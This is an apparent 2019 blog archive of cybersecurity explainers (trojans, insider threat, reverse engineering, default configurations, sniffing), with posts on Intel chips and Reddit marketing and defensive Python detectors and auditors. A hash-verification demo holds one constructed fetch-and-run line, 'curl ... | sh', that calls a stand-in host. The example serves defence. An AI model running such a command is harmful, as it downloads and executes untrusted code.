23 August, 2019

That horse bites

Horses are majestic animals and can be a very good friend to a human being. That is true only of real horses, though, and not of the ones discussed in this blog. This blog discusses what trojan horses are and how cybercriminals use them to attack their victims and cause massive damage.

Malware is malicious software written by attackers to perform malicious activities on the systems it infects. It comes in several types, each used for different tasks, and one of those types is the trojan horse. Do not be deceived by the name: it is not a real horse. A trojan horse is malware coded by threat actors to pose as legitimate, trusted software. Attackers bundle malicious code with a legitimate-looking program and deliver it to their victims. The trojan could be wrapped in a simple-looking application, such as a calculator, or hidden under the hood of a video game downloaded from an unknown website. Attackers use various techniques to spread trojans across the internet: email attachments, hyperlinks in emails and malicious websites. Nowadays not even the official mobile app stores are safe from attackers uploading trojanised apps. This puts hundreds of millions of people in danger, because almost everyone uses email and tends to open any attachment without questioning the source, and almost everyone uses a smartphone on which they install apps for personal and official tasks, entertainment and so on. Imagine so many people downloading software that they believe is legitimate, that behaves as if it were legitimate, but that behind the scenes performs malicious activity putting their data or privacy in jeopardy.

Trojan horses come in various flavours and perform different functions. Common categories are the security software disabling trojan, proxy trojan, denial-of-service trojan, data-sending trojan, FTP trojan, destructive trojan and remote access trojan (RAT). A security software disabling trojan disables any security software installed on the system, such as antivirus, which makes the threat actor's job easier. A proxy trojan turns the victim's computer into a proxy server that the attacker routes their malicious activity through to attack other systems; the final victim sees the attack coming from the infected machine rather than from the attacker's own system. A denial-of-service trojan lets an adversary launch denial-of-service (DoS) attacks from the infected computer. A data-sending trojan incorporates a keylogger that captures sensitive information typed on the victim's computer and sends it to the threat actor. An FTP trojan opens an FTP service on the infected system, typically on port 21, so the attacker can connect and transfer files in and out. A destructive trojan is used to destroy data stored on the victim's computer. A remote access trojan usually poses as a legitimate system utility, and threat actors use it to take full control of the infected system.

Take the remote access trojan as an example. Say a person wants to clear unwanted files from their hard drive and searches the internet for a utility to do it. They find a legitimate-looking tool on a website they have never visited before, download it and install it, hoping it will solve their problem. The utility does what they expected, but underneath its clutter-removing good looks it also hands full remote access to the attackers who planted the trojan on the download site. The person has become the victim of a remote access trojan and has no idea what the attacker can now do with their computer. Trojan horses are sneaky and stealthy, and appropriate measures, such as obtaining software only from trusted sources and verifying it before installation, should be taken to protect critical IT infrastructure from them. Otherwise this type of malware can cause significant damage.


10 August, 2019

Intel's 9th Gen Mobile Processors

With its range of processors, Intel has a strong hold over the Indian market, and today it is expanding that lineup to include more high-performance chipsets for both mobile and desktop computers. Meet Intel's 9th generation chipsets, also known as Coffee Lake.

This launch brings India the 9th generation of higher-end mobile chipsets, spanning Core i5, Core i7 and Core i9. The H-series lineup is designed across the board for a 45-watt TDP (Thermal Design Power) and is compatible with the same motherboards as the 8th generation. These top-tier processors were generally made with gamers in mind, but according to Intel there is a large market of content creators, with slightly different needs, that has grown exponentially over the past 18 months; Intel estimates that global market at around 130 million. Another statistic from Intel puts the number of gamers and esports players at an estimated 580 million, many of whom also follow esports as spectators. Intel therefore identifies three distinct types of user who would benefit from these products: gamers, content creators and those seeking general premium performance while prioritising battery life.

Intel is introducing six mobile processors, two each under the i5, i7 and i9 brands, with 4, 6 and 8 cores respectively. The flagship i9-9980HK is the first mobile processor to reach a 5 GHz turbo frequency, from a 2.4 GHz base clock. The 'K' suffix indicates that the processor is unlocked and can be overclocked, provided temperatures are kept under control. Laptops with these processors will soon be available in India.

These mobile chipsets also bring features such as Intel Wi-Fi 6, which offers theoretical gigabit speeds, up to 75 percent lower latency and support for four times as many devices, all of which matter to game streamers. Other upgrades include support for Intel Optane Memory H10 and the SSD 660p. Up to 128 GB of DDR4 RAM is supported for the most demanding users, and Thunderbolt 3 also makes the cut.

New additions to the desktop family bring the lineup to over 25 products, ranging from Core i9 down to Core i3 and even Pentium Gold and Celeron chipsets, with the same Wi-Fi 6, Optane memory and Optane SSD support. Intel claims these processors deliver 47 percent higher FPS in gaming, 2.1x faster photo editing and about 53 percent better mixed-use multitasking compared with a system on a five-year refresh cycle. At the higher end (Core i5-9600 and above) the new chipsets are the unlocked K and KF variants, where the F-suffix parts have the integrated GPU disabled and require a discrete graphics card.

With this barrage of new processors for both laptops and desktops, Intel will surely shake up the Indian market. Early OEM adopters in India include Acer, ASUS, Dell, HP, Lenovo and MSI, whose laptops will reach the market in the coming months. Consumers now have desktop options in every price segment and can make purchase decisions accordingly.


7 August, 2019

Artificial Intelligence in Cybersecurity

In a world of automation, technology experts have made it possible for computers to think for themselves. We are talking about artificial intelligence, which is used in many industries for many different applications. This blog discusses the ways artificial intelligence benefits the cyber security domain. Artificial intelligence, or AI, is the technology used to make specific computer systems reason and make decisions by themselves.

There are two sides to artificial intelligence. One is the side people can take advantage of to make their tasks easier and to build systems that learn and perform specific functions on their own. The other focuses on the potential dangers posed by ingenious computer systems that use artificial intelligence. Artificial intelligence is still in its early stages, and a full-fledged, self-aware artificially intelligent system is still some way off. Examples of artificially intelligent systems today are the personal assistants in smartphones from several manufacturers, the assistants built into various IoT devices, and many walking and talking robots.

The cybersecurity industry can also benefit from artificial intelligence. Many security controls are being developed with built-in AI capabilities that help keep threat actors at bay. By using artificial intelligence, security systems can predict attack patterns, identify the type of attack being used, judge whether incoming network traffic is malicious or not, and produce other predictions that help security professionals build an organisation's security strategy.

Cybersecurity is often portrayed as an unfair fight between attacker and defender. On most occasions the adversaries achieve their objectives and evade the security controls because they consistently stay one step ahead of the people defending the systems. Organising the many security aspects within a network is challenging, because each layer of defence involves a great many factors, and attackers readily exploit the human element of an organisation's network.

Cybersecurity can draw numerous benefits from artificial intelligence. With its help, security professionals can greatly improve processes such as threat detection, network security and threat handling. It lets us rethink system and network designs, and the way everything is interconnected, with the assistance of intelligent processing machines. Security professionals can build intelligent networks containing self-learning security systems that respond to security breaches and other threats. Intelligent bots may eventually replace the vulnerable human component of a network. The rise of AI could help the cybersecurity industry flourish.

Examples of artificially intelligent security systems are Intrusion Detection Systems and Intrusion Prevention Systems that use AI to detect and prevent cyber-attacks. These systems learn to separate malicious traffic from legitimate traffic and help organisations safeguard critical systems and information, lowering the number of false positives while increasing the proportion of attacks detected. Attackers keep inventing new tricks to fool security systems; one such technique is polymorphic malware, which changes its code with every copy so that fixed signatures no longer match. Because AI-based IDS and IPS products judge behaviour rather than exact byte patterns, they stand a far better chance of catching such attacks and protecting the company's network and sensitive information, although the trade-off between detection rate and false positives still has to be tuned rather than assumed away.
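As an added example (not code from the original post), here is the kind of baseline-and-threshold check an IDS can run over per-host flow summaries. It uses a simple statistical baseline rather than a trained neural model, but it shows the point made above: a detector keyed on behaviour (connection counts, distinct destination ports, bytes sent) rather than byte signatures, and the detection-rate versus false-positive trade-off that has to be tuned. The hosts, flow records and labels are all constructed.

```python
"""Score network flow summaries against a learned benign baseline.

Added example, not from the original post. Learn what "normal" looks like
from benign traffic, flag windows that deviate, and measure detection rate
against false positives. All records below are constructed.
"""
from dataclasses import dataclass
from statistics import mean, pstdev


@dataclass(frozen=True)
class Window:
    src: str
    conns: int        # TCP connections opened in the window
    dst_ports: int    # distinct destination ports touched
    bytes_out: int    # bytes sent by the host
    malicious: bool   # ground truth, used only for evaluation


FEATURES = ("conns", "dst_ports", "bytes_out")

# Constructed benign training windows: ordinary office hosts
BENIGN_TRAIN = [
    Window("10.0.0.11", 40, 5, 120_000, False),
    Window("10.0.0.12", 55, 6, 150_000, False),
    Window("10.0.0.13", 35, 4, 90_000, False),
    Window("10.0.0.14", 60, 7, 200_000, False),
    Window("10.0.0.15", 45, 5, 130_000, False),
    Window("10.0.0.16", 50, 6, 110_000, False),
]

# Constructed test windows: benign hosts plus a port scan and a data exfiltration
TEST = [
    Window("10.0.0.21", 48, 5, 140_000, False),
    Window("10.0.0.22", 62, 7, 210_000, False),
    Window("10.0.0.23", 30, 4, 80_000, False),
    Window("10.0.0.24", 70, 8, 240_000, False),   # busy but legitimate
    Window("10.0.0.66", 900, 600, 60_000, True),  # port scan: many ports, little data
    Window("10.0.0.77", 20, 2, 9_000_000, True),  # exfiltration: few connections, huge upload
]


def fit_baseline(windows):
    """Per-feature mean and population standard deviation learned from benign traffic."""
    baseline = {}
    for f in FEATURES:
        values = [getattr(w, f) for w in windows]
        baseline[f] = (mean(values), pstdev(values) or 1.0)  # guard against zero spread
    return baseline


def anomaly_score(window, baseline):
    """Largest absolute z-score across features: one badly off feature is enough to alert."""
    return max(abs(getattr(window, f) - mu) / sd for f, (mu, sd) in baseline.items())


def evaluate(windows, baseline, threshold):
    """Return (detection_rate, false_positive_rate, flagged_srcs) at a given threshold."""
    tp = fp = 0
    flagged = []
    n_mal = sum(w.malicious for w in windows)
    n_ben = len(windows) - n_mal
    for w in windows:
        if anomaly_score(w, baseline) > threshold:
            flagged.append(w.src)
            if w.malicious:
                tp += 1
            else:
                fp += 1
    return tp / n_mal, fp / n_ben, flagged


if __name__ == "__main__":
    baseline = fit_baseline(BENIGN_TRAIN)
    for thr in (1.5, 2.5, 4.0):
        print(f"threshold {thr}:", evaluate(TEST, baseline, thr))
```

Run it and compare thresholds: at 4.0 the port scan and the bulk upload are both flagged with no false positives, while at 2.5 the busy-but-legitimate host is flagged as well. Whether that extra alert is acceptable depends on how many alerts the analysts can triage, which is exactly the tuning the paragraph above refers to.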


1 August, 2019

Insider Threat

Companies spend vast sums designing and building their business infrastructure. On top of that they spend thousands more on operation and maintenance, and to protect that infrastructure they spend even more on buying and implementing security controls. These controls, however, are often not enough to stop an adversary from compromising the organisation's network and the systems attached to it; merely putting security controls in place does not prevent threat actors from stealing sensitive information. This blog talks about how insider threat has been a major factor behind compromised networks and security breaches.

An insider is a person considered to be closely related to an organisation: current employees, maintenance staff, suppliers or partners, or even disgruntled former employees or contractors. The person may have authorised access to the organisation's systems, premises, server rooms, sensitive records and so on. An insider threat arises when such closely related people use their access rights to damage the organisation's sensitive information, network infrastructure or vital computer systems. In other words, an insider threat is the type of security threat in which an insider, intentionally or unintentionally, misuses access in a way that negatively affects the confidentiality, integrity or availability of the organisation's sensitive data or network infrastructure.

Insider threats are highly dangerous, and protecting the organisation against them is crucial, because they are very hard to detect even with state-of-the-art security tools and can cause significant damage. They may arise from deliberately malicious activity or from unintentional, accidental actions. Malicious insiders commonly aim at corporate, industrial or other espionage, theft of intellectual property, fraud and sabotage of the target organisation. Accidental insider threats usually involve convenience, poor judgement, malware, stolen usernames and passwords, and plain human error.

Insider threats can cause a great deal of damage. Suppose an employee, while trying to share a highly sensitive piece of information with a colleague, accidentally shares it with someone outside the organisation or someone who was never meant to know it. That single mistake could cause vast damage to the organisation the information concerns. Another example is an employee who wants revenge on the company they used to work for. They can use their knowledge of the organisation's infrastructure and IT assets to orchestrate an attack. Because they know the internal network, and probably the internal IP addresses of the systems on it, they could craft malware or an exploit to compromise the network with far less effort than an outsider and cause major damage, either by stealing sensitive information such as intellectual property or by damaging systems so severely that they stop functioning altogether.

In one survey, 69% of organisations reported having experienced an attempted attack on, or corruption of, their data in the recent past. Research puts the average cost of insider threats to an organisation at more than $8 million, and containing an insider incident takes more than two months.
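Three of the indicators described above can be checked mechanically, given an HR roster and an access audit log: a departed user's account still being used, a download far above the user's own baseline, and a restricted document shared to an external address (the accidental-sharing case). The following is an added example, not part of the original post; the log lines, user names, roster and mail domain are all constructed.

```python
"""Flag insider-threat indicators in a constructed audit log.

Added example, not part of the original post. Checks three patterns:
a departed user's account still active, a bulk download far above the
user's own median, and a 'restricted' document shared outside the
organisation. Log, roster and domain are constructed.
"""
from collections import defaultdict
from datetime import date
from statistics import median

CORPORATE_DOMAINS = {"example.com"}   # assumption: the organisation's own mail domain

# Constructed HR roster: termination date, or None if still employed
ROSTER = {"alice": None, "bob": date(2019, 7, 15), "carol": None}

# Constructed audit log: ISO timestamp followed by key=value pairs
AUDIT_LOG = """\
2019-07-29T09:02:11 user=alice action=download resource=finance/ledger.csv count=30
2019-07-29T11:40:05 user=alice action=download resource=finance/ar.csv count=25
2019-07-30T10:12:44 user=carol action=share resource=rnd/design.pdf to=dan@example.com classification=restricted
2019-07-30T14:03:19 user=alice action=download resource=finance/ap.csv count=40
2019-07-30T23:51:07 user=bob action=download resource=hr/salaries.xlsx count=1
2019-07-31T01:15:30 user=alice action=download resource=finance/all_customers.csv count=1200
2019-07-31T16:20:00 user=carol action=share resource=rnd/roadmap.pdf to=friend@mail.example.net classification=restricted
"""


def parse_line(line):
    """Turn one log line into a dict; 'count' becomes an int, 'date' a date object."""
    ts, _, rest = line.partition(" ")
    event = {"ts": ts, "date": date.fromisoformat(ts[:10])}
    for token in rest.split():
        key, _, value = token.partition("=")
        event[key] = value
    if "count" in event:
        event["count"] = int(event["count"])
    return event


def detect(log_text, roster, corporate_domains, spike_factor=10):
    """Return a list of (indicator, user, detail) findings."""
    events = [parse_line(l) for l in log_text.splitlines() if l.strip()]
    findings = []

    # 1. Departed accounts still active: offboarding failed or was bypassed
    for e in events:
        left = roster.get(e["user"])
        if left is not None and e["date"] > left:
            findings.append(("departed_account_active", e["user"], e["resource"]))

    # 2. Bulk access: each download compared with the user's own median volume
    counts = defaultdict(list)
    for e in events:
        if e.get("action") == "download":
            counts[e["user"]].append(e["count"])
    for e in events:
        if e.get("action") == "download" and len(counts[e["user"]]) >= 3:
            if e["count"] > spike_factor * median(counts[e["user"]]):
                findings.append(("bulk_download", e["user"], e["resource"]))

    # 3. Restricted data leaving the organisation, whether deliberate or a mistake
    for e in events:
        if e.get("action") == "share" and e.get("classification") == "restricted":
            domain = e.get("to", "").rpartition("@")[2]
            if domain not in corporate_domains:
                findings.append(("restricted_external_share", e["user"], e["to"]))
    return findings


if __name__ == "__main__":
    for finding in detect(AUDIT_LOG, ROSTER, CORPORATE_DOMAINS):
        print(*finding)
```

The baseline in check 2 is the user's own median, not a global threshold, so an analyst who routinely pulls large reports is not flagged for doing so, while a one-off 1200-record pull by someone whose normal is a few dozen records is. Check 1 needs a current roster feed; in practice it is the HR-to-IAM integration, not the detection logic, that fails.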


31 July, 2019

Reverse Engineering

People use many different things nowadays to make their tasks easier, without knowing how those things work. They simply use the hardware and software and put it aside. Certain people, however, are interested in the inner workings of hardware and software and use that knowledge to their advantage. This blog discusses the process of reverse engineering and the ways threat actors can take advantage of it to orchestrate an attack.

Reverse engineering is the process of working out the inner workings of a hardware or software object. It is undertaken to discover the architecture and design of the object, or to gain knowledge about it and its operation, and it applies to objects from many fields, such as software engineering, electronic engineering and mechanical engineering. The process is mainly used for analysis rather than to create copies of an object; some people do use it to produce replicas, but that is another story. Reverse engineering is also used to re-document old legacy systems and to perform competitor analysis.

Malware researchers use reverse engineering to analyse the different variants of malware found in the wild. They dissect the malware's code to work out how it operates, so that they can help stop it spreading and build controls that prevent it from entering the network again. Reverse engineering also yields the malware signatures used by IDS and IPS systems, host-based antivirus software and every other security control that relies on signature-based detection and prevention; a signature can only be written once someone has taken the sample apart.

Cyber-criminals use reverse engineering to work out how a particular piece of software or hardware functions and create hacks that make it do things it was never meant to do. For example, companies sell paid licences for their operating systems. Attackers work out how the licensing code operates and find a way to make the operating system activate fully without a licence key; they reverse engineer and modify the installation files to achieve this and then distribute the modified installation package on the internet for free. Nobody should trust such installation files: they have been taken apart and altered by an attacker, so there is no telling what the code is doing beneath the cover of a legitimate-looking operating system.

Another example is an attacker modifying the APK file used to install a specific open-source health app on Android. People installing the repackaged app believe it is legitimate, while it has in fact been turned into a malicious one. By reverse engineering the app, the attacker can work out how data is transmitted between the app and its servers and find a way to steal that data simply by modifying the app's own code, without any separate malware. This could cause people to lose their protected health information, which in turn could lead to further harm.
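Both the trojanised disk-cleaning utility in the earlier post on trojan horses and the repackaged operating system installer and APK described here share one practical defence: before running a download, compare its hash against the manifest the publisher distributes out of band. The following is an added example (not code from the original post). The file names, contents and manifest are constructed; a real manifest would come from the publisher over an authenticated channel, and a matching hash only proves the file is the one the publisher described, not that the publisher is trustworthy.

```python
"""Verify downloaded installers against a trusted hash manifest before running them.

Added example, not part of the original post. A publisher's known-good SHA-256
manifest is compared against the files actually downloaded, catching tampered
files, files that were never delivered and extra files slipped into the bundle.
All file names, contents and hashes here are constructed.
"""
import hashlib
import hmac
import os
import tempfile


def sha256_file(path, chunk_size=1 << 16):
    """Stream the file through SHA-256 so a multi-gigabyte installer never has to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def parse_manifest(text):
    """Parse sha256sum-style lines ('<hex>  <filename>'); blanks and '#' comments are ignored."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, name = line.partition("  ")
        if len(digest) != 64 or not name:
            raise ValueError(f"malformed manifest line: {line!r}")
        entries[name.strip()] = digest.lower()
    return entries


def verify_downloads(directory, manifest):
    """Return {'ok': [...], 'tampered': [...], 'missing': [...], 'unexpected': [...]}."""
    result = {"ok": [], "tampered": [], "missing": [], "unexpected": []}
    present = set(os.listdir(directory))
    for name, expected in manifest.items():
        if name not in present:
            result["missing"].append(name)
            continue
        actual = sha256_file(os.path.join(directory, name))
        # compare_digest is not strictly needed for public hashes, but it costs nothing
        if hmac.compare_digest(actual, expected):
            result["ok"].append(name)
        else:
            result["tampered"].append(name)
    # anything the manifest does not list was not part of the publisher's release
    result["unexpected"] = sorted(present - set(manifest))
    return result


def demo():
    """Constructed download folder: one clean file, one tampered file, one extra payload."""
    clean = b"echo 'clean up temp files'\n"
    # constructed: the original script with an extra fetch-and-run line appended
    tampered = b"echo 'clean up temp files'\ncurl http://198.51.100.7/x | sh\n"
    with tempfile.TemporaryDirectory() as d:
        for name, data in {"cleaner.sh": clean, "health.apk": tampered, "extra.dll": b"\x00"}.items():
            with open(os.path.join(d, name), "wb") as f:
                f.write(data)
        # The publisher's manifest lists the hashes of the files they actually released.
        manifest_text = "\n".join([
            "# constructed manifest",
            f"{hashlib.sha256(clean).hexdigest()}  cleaner.sh",
            f"{hashlib.sha256(b'echo original app').hexdigest()}  health.apk",
            f"{hashlib.sha256(b'not downloaded').hexdigest()}  readme.txt",
        ])
        return verify_downloads(d, parse_manifest(manifest_text))


if __name__ == "__main__":
    print(demo())
```

The check reports four buckets rather than a single pass/fail, because each means something different to the person about to install: a tampered file is the trojan case, a missing file means an incomplete download, and an unexpected file is the extra payload a repackaged bundle tends to carry.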


29 July, 2019

The importance of security inside the cloud

It is a world where people love mobility. They like being able to access their online resources from anywhere, because it lets them work while on the move from one place to another. This new-age need for mobility raised the demand for cloud computing, which in turn accelerated innovation in the cloud computing domain. Numerous new cloud technologies now let users perform many different tasks with ease from wherever they happen to be. Cloud providers implement various security technologies to protect their cloud infrastructure from the multitude of cyber attacks that threaten the infrastructure and its users. That, however, is the security of the cloud. What about security inside the cloud? This blog talks about why it is just as important to secure what lies within the cloud, and what impact cyber attacks there can have on the cloud service provider and its customers.

A cloud is essentially a network infrastructure containing components such as storage, servers and computer systems that a cloud service provider provisions to its customers according to their needs. The components are virtualised to serve several customers and to save costs. The cloud service provider is responsible for maintaining the infrastructure and keeping it running, and for another critical duty: securing the cloud infrastructure against any and all cyber threats. Whether it is a denial-of-service attack against the cloud's servers or storage, or a malware attack on the provider's systems that host users' resources, keeping the infrastructure secure at all times is the provider's responsibility. This protection of the infrastructure itself is referred to as security of the cloud. However, putting security measures around the infrastructure alone comes nowhere near ensuring that cybercriminals cannot harm the provider and its customers. Security controls are also needed inside the cloud, meaning everything that lives within the cloud components: information, applications and so on. This is referred to as security in the cloud, and it is essential for fending off attackers who try to compromise cloud-hosted assets. In the shared-responsibility model that providers publish, this part belongs to the customer.

Security in the cloud is essential because, just as adversaries compromise physical systems, they can just as easily attack the virtual servers that a provider's customers run. Say a user is running a Windows version inside a cloud virtual machine that has not been updated for some time. Just as a hacker would be tempted to attack a physical machine, they can attack that virtual machine through any web-borne attack; the user might fall victim and download a trojan horse, which then infects the virtual machine from within. Some people are also in the habit of not installing any security software in their virtual machines, assuming that the cloud provider has secured the VM from the outside. This is poor thinking: even if the provider has secured the VM from the outside, malware can still infect the operating system, as in the example above. Securing the cloud infrastructure from the outside is good, but all that security is of no use if threat actors can cause damage from within. A good analogy is a boat without holes: it will still sink if someone keeps pouring water into it.

Security in the cloud is just as crucial as security of the cloud, and every cloud user has to understand this if they are to keep their critical assets in the cloud safe from cybercriminals.


25 July, 2019

Dangers caused by default configurations

It is 2019, and the world has reached the point where many different technologies have emerged that can be used to do pretty much everything. From sewing machines to the radar systems in aircraft, everything is loaded with state-of-the-art technology. Every gadget can be customised and configured to one's own needs, and various mechanisms exist to secure these gadgets. Devices can be configured with appropriate security settings; however, manufacturers ship a great many devices with default configurations, and this has caused security problems in the past and is still causing them. This blog talks about the default configurations that devices are left with by manufacturers and the people who use them, and how this neglect leads to those devices being attacked by cyber-criminals.

Leaving a device in its default configuration means that all of its settings are left unaltered at the factory values: nothing is changed after purchase, and the settings remain as they were when the equipment was manufactured. Defaults can include the username, the password, the security protocols in use or any other setting of the device. The devices most often left in their default configuration are routers, wireless access points and security cameras, among many others.

Routers and wireless access points are often left with the default usernames and passwords that grant access to their management portals. An attacker who logs into that portal can position themselves as a man-in-the-middle and intercept the traffic passing through the router or access point, and from there steal sensitive information such as the credentials for websites the user visits. Wireless access points are also left with their default Wi-Fi passwords, which anyone can read off the label and use to connect their own devices.

Security cameras are used all around the world in hospitals, apartment buildings, schools, colleges, stadiums, government facilities and even on roads, to watch the surroundings and make sure no malicious activity is taking place. When their owners leave them in default configuration, those cameras become a weapon for threat actors. Attackers can log in using the default credentials set by the manufacturer and record footage from cameras placed in locations that are off-limits to unauthorised personnel. For example, if a camera inside a research facility is taken over using its default credentials, attackers can record video and take screenshots of sensitive information about the facility's infrastructure and other assets. They can then use that information to orchestrate more sophisticated attacks, or sell it to competitors or to foreign parties wanting to spy on the facility.

Default passwords have been the cause of many security breaches and information leaks. It has been reported that around 63 per cent of security breaches have involved stolen, weak or default passwords. It is therefore necessary to make sure that such misconfigurations are taken care of by manufacturers and their customers alike: manufacturers by shipping unique per-device credentials and forcing a change on first login, customers by changing every default before the device goes into service.
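The audit below is an added example, not from the original post. It checks a device inventory for the conditions described above: factory-default admin credentials, a Wi-Fi key identical to the one printed on the label, WEP or open wireless, WPS left on, and a management interface reachable from the internet. Vendors, models, devices and the default-credential table are all constructed; a real audit would draw on the vendor's documented defaults and the live device configuration rather than a hand-typed list.

```python
"""Audit device configurations for factory-default and weak settings.

Added example, not from the original post. Vendors, models, devices and the
default-credential table are constructed stand-ins.
"""
import re

# Constructed table: (vendor, model) -> well-known default admin credentials
DEFAULT_CREDS = {
    ("ExampleNet", "R100"): ("admin", "admin"),
    ("ExampleNet", "AP20"): ("admin", "password"),
    ("CamCo", "IPC-1"): ("root", "12345"),
}

# Constructed inventory, as it might be exported from a management system
DEVICES = [
    {"vendor": "ExampleNet", "model": "R100", "type": "router", "admin_user": "admin",
     "admin_pass": "admin", "wifi_security": "WPA2", "wifi_psk": "A1B2C3D4E5",
     "label_psk": "A1B2C3D4E5", "wps": True, "wan_mgmt": True},
    {"vendor": "ExampleNet", "model": "AP20", "type": "ap", "admin_user": "admin",
     "admin_pass": "Tr0ub4dor&3!xk", "wifi_security": "WEP", "wifi_psk": "1234567890",
     "label_psk": "ZZZZZZZZZZ", "wps": False, "wan_mgmt": False},
    {"vendor": "CamCo", "model": "IPC-1", "type": "camera", "admin_user": "root",
     "admin_pass": "12345", "wan_mgmt": True},
    {"vendor": "CamCo", "model": "IPC-1", "type": "camera", "admin_user": "ops",
     "admin_pass": "long-random-passphrase-7781", "wan_mgmt": False},
]


def audit_device(dev, default_creds):
    """Return a list of (severity, finding) tuples for one device."""
    findings = []
    key = (dev["vendor"], dev["model"])
    if default_creds.get(key) == (dev["admin_user"], dev["admin_pass"]):
        findings.append(("critical", "factory default admin credentials"))
    elif len(dev["admin_pass"]) < 12 or re.fullmatch(r"\d+", dev["admin_pass"]):
        findings.append(("high", "weak admin password"))
    # Wireless checks only make sense for devices that actually run a radio
    if dev["type"] in ("router", "ap") and dev.get("wifi_security") in ("WEP", "OPEN", None):
        findings.append(("critical", f"wireless security is {dev.get('wifi_security') or 'OPEN'}"))
    if dev.get("wifi_psk") and dev.get("wifi_psk") == dev.get("label_psk"):
        findings.append(("high", "Wi-Fi key is the one printed on the device label"))
    if dev.get("wps"):
        findings.append(("medium", "WPS enabled"))
    if dev.get("wan_mgmt"):
        findings.append(("high", "management interface reachable from the WAN/internet"))
    return findings


def audit_inventory(devices, default_creds=DEFAULT_CREDS):
    """Map 'vendor model #index' -> findings, omitting devices with nothing to report."""
    report = {}
    for i, dev in enumerate(devices):
        findings = audit_device(dev, default_creds)
        if findings:
            report[f"{dev['vendor']} {dev['model']} #{i}"] = findings
    return report


if __name__ == "__main__":
    for name, findings in audit_inventory(DEVICES).items():
        print(name)
        for severity, message in findings:
            print(f"  [{severity}] {message}")
```

The default-credential match is keyed on vendor and model because "admin/admin" on one product and "root/12345" on another are both defaults; a generic weak-password rule alone would miss the second camera's login if it happened to be long. The last device passes every check, which is what a device should look like before it is put into service.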


24 July, 2019

Can Reddit Be the Future Of Online Marketing For Businesses?

Why the reluctance to advertise here? Posts like this are only a small part of a growing body of evidence that marketers are finally making inroads into the platform. Why wouldn't they? Thousands of posts like this fuel a vibrant discussion among Reddit users, the Redditors, every day, on a platform where individuals can share nearly anything: videos, pictures, problems, thoughts and analyses, often with an equally well-meaning community that engages with them. Marketers who keep ignoring Reddit as a publicity medium, however, are likely to regret it.

Reddit's CEO, Steve Huffman, and his team are working hard to attract advertisers to the platform, and the idea of Reddit as a viable alternative to the Google and Facebook duopoly is now gaining credibility with the major agency holding companies. It is the third most visited website in the United States, the self-proclaimed "front page of the internet", with 330 million monthly active users. Most of those 330 million are college-educated men under the age of 35.

But demographics are not the only thing that makes Reddit special. Navigating the site can be difficult at first, as many newcomers will tell you. It comes with a distinctive vocabulary and a scheme for rewarding contributions, which can leave advertisers with a flood of questions. Luckily, they are not hard to answer: all you need to do is ask. Large advertisers now report that clients are asking about the platform more frequently, and the almost 15-year-old business looks like the next big thing in marketing. If you are a marketer looking to dive into Reddit, three tips might help.

Be helpful and earn karma
Users earn karma, the social currency that powers the site, when other users 'upvote' the posts or comments they enjoy. Conversely, contributions that others see as detracting from the wider discussion are downvoted, so karma can vanish just as readily. Brands new to the site should work to raise their karma organically by posting comments and links that are of value to other users, reflecting a genuine effort to engage meaningfully with the community. It takes planning and consideration, but the rewards can be worth the effort: you gain no special privileges, but you will be seen as more credible.

Answer everything
Active Reddit users subscribe to a multitude of communities, called subreddits, that match their interests. Brands with something to say on a specific subject should strive to be active in the smaller groups. Redditors are often keen to learn, and being a trusted source on the platform is one of the best ways to inform them. Hope Horner, CEO of the video production company Lemonlight Media, stresses that brands should offer value rather than advertising when sharing any media on Reddit: "Reddit users are particularly sensitive to ads, so don't publish open promotional videos."

Finding the right community
Reddit offers brands engagement opportunities in a format unlike that of other platforms. One of the broader subreddits, /r/AMA, lets posters start an "Ask Me Anything" thread inviting other users to do precisely that. Politicians, executives and other public figures have used this outlet to connect authentically with users and offer highly valued transparency. Some brands have also started to test the format. For example, Audi hosted a live AMA series with celebrities and high-performance cars. Dubbed "Think Faster: The World's Fastest AMA", the series worked because it did not read as a promotion: instead of focusing on the products, Audi put the spotlight on its famous guests, which drew a great deal of attention to the brand.

Marketers still face some interesting barriers to using Reddit efficiently as an ad platform. Karma can disappear fast, subreddits can be hard to break into, and AMAs can go badly wrong. Nevertheless, the site's user base represents a potential gold mine for many brands, and its leadership is ready to assist brands willing to start experimenting with it. Now may be the perfect time.


20 July, 2019

Sniffing attacks

Bob works in the accounts department of a very large firm. Bob is on vacation with his family, and he is enjoying it a lot. He is sitting on the beach right in front of the hotel he is staying at. Someone from Bob's office calls him and asks him to check up on something at the office. Bob goes to his hotel room, picks up his laptop, and connects it to the hotel Wi-Fi. Knowing very little of the dangers of using a public wireless network, Bob goes ahead and uses a remote connection service to connect to his office's network so that he can access the files he is supposed to check. He finishes his work and goes back to enjoying his vacation with his family. After his vacation is over, he goes back to his office and finds out that there has been a security breach, and that someone had used the company's bank accounts to transfer money overseas. In the investigation of the breach, the company finds out that someone had used Bob's credentials to remotely access the files belonging to the accounts department. Now Bob has come under suspicion, and he is in danger of losing his job.

Remember how Bob used the hotel Wi-Fi to access his office network? Well, it turns out that a hacker was already connected to the same wireless access point as Bob, that the attacker had sniffed Bob's remote connection credentials, and that they used those to log in to the company's network and steal information regarding the company's bank accounts. This blog talks about sniffing attacks and the impact they can have on the victims who fall prey to this type of cyber-attack.

In the same way that people listen in on other people talking and sharing information, threat actors can use sniffing to capture their victims' information. Usually what happens in a sniffing attack is that threat actors use a single tool or a combination of several tools and techniques to connect their computers to a particular network and listen to, or intercept, the network traffic flowing on that network. One typical example of a sniffing attack is an attacker who manages to connect their computer to a wireless access point and then sniffs the network traffic flowing to and from all the client devices connected to that same access point. The target wireless access point could be located anywhere, such as a hotel you are staying or planning to stay at, an airport your next flight departs from or lands at, a restaurant where you will have your next meal, or a local subway station. The point is that anyone could become the target of a sniffing attack anywhere in the world, and if people are not vigilant enough, there could be several adverse consequences they might have to face.

By using sniffers, adversaries can steal a lot of sensitive information about their victims. The information could include usernames and passwords for victims' accounts, bank account information, details of the protocols being used for a specific kind of communication within an organisation, the types of applications the victims use, and which parties the communication is taking place between. A sniffing attack is usually very hard to detect, as the sniffing utilities used by threat actors do not cause any disruption to the operation of the network or of the client devices connected to it. The sniffing utilities simply sit silently and keep listening for information.

Many times, sniffing attacks serve as the starting point for further, more sophisticated cyber-attacks, and this makes them even more dangerous. Hence, security controls should be put in place to protect against sniffing attacks, and people should be aware that such attacks do exist.
